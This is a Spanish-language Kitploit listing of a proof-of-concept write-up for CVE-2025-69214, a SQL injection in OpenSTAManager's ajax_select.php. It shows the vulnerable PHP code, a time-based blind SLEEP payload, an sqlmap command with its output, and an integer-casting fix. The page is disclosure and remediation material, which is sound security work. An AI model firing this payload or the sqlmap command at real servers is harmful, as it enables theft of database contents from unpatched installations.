Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-69214 — Prueba de concepto para CVE-2025-69214: inyección SQL en el endpoint componenti de ajax_select.php de OpenSTAManager. Incluye análisis del código vulnerable, explotación ciega basada en tiempo con SQLMap y guía de remediación. | Kitploit
Herramientas/GitHubGitHub/lukasz-rybak/cve-2025-69214
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Bases de Datos
GitHublukasz-rybak/cve-2025-69214

CVE-2025-69214

Prueba de concepto para CVE-2025-69214: inyección SQL en el endpoint componenti de ajax_select.php de OpenSTAManager. Incluye análisis del código vulnerable, explotación ciega basada en tiempo con SQLMap y guía de remediación.

Ver Repositorio
3hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-69214: OpenSTAManager tiene una inyección SQL en ajax_select.php (endpoint componenti)

Resumen

CampoDetalles
ID CVECVE-2025-69214
GravedadALTA
AvisoVer aviso
Descubierto porLukasz Rybak

Productos afectados

  • devcode-it/openstamanager (versiones: <= 2.9.8)

Clasificación CWE

  • CWE-89: Neutralización incorrecta de elementos especiales usados en un comando SQL ('Inyección SQL')

Detalles

Resumen

Existe una vulnerabilidad de inyección SQL en el endpoint ajax_select.php al manejar la operación componenti. Un atacante autenticado puede inyectar código SQL malicioso a través del parámetro options[matricola].

Prueba de concepto

Código vulnerable

Archivo: modules/impianti/ajax/select.php:122-124

root@kitploit:~
case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }

Flujo de datos

  1. Origen: $_GET['options']['matricola'] → $superselect['matricola']
  2. Vulnerable: La entrada del usuario se concatena directamente en la cláusula IN() sin sanitización
  3. Destino: Consulta ejecutada a través del framework AJAX

Explotación

PoC manual (SQLi ciega basada en tiempo):

root@kitploit:~
GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
image

Explotación con SQLMap:

root@kitploit:~
sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3

Salida de SQLMap:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12
image

Impacto

  • Exfiltración de datos: La inyección SQL ciega basada en tiempo permite la extracción completa de la base de datos
  • Omisión de autenticación: Acceso a datos sensibles de componentes y equipos
  • Manipulación de datos: Posible modificación no autorizada de registros

Corrección

Convertir valores a enteros antes de usarlos en SQL:

Antes:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}

Después:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}

Créditos

Descubierto por: Łukasz Rybak

Referencias

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69214
  • https://github.com/advisories/GHSA-qjv8-63xq-gq8m

Aviso legal

Este CVE fue divulgado de manera responsable siguiendo las prácticas de divulgación coordinada de vulnerabilidades. La información proporcionada aquí es solo para fines educativos y defensivos.

Descargar herramienta